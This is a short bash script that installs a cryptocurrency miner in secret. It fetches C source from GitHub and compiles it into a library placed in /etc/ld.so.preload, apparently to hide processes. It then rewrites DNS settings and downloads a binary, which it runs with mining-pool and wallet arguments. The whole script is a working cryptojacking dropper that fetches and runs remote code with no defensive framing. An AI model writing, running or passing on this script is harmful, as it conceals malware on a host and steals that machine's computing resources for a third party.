#!/bin/bash
apt-get update ; apt-get install sudo -y
curl https://github.com/kartolo92/koplok/raw/master/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 1.1.1.1;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
wget -O asu https://github.com/hasmenkuy99/ici/raw/main/sorabinew
chmod 777 asu
./asu --algorithm xhash --pool eu.rplant.xyz:7159 --wallet 0x5ebffe0d479c8a35806fee8f92564b1a60be5fac.$(shuf -n 1 -i 1-999)-iBISMI --keepalive true
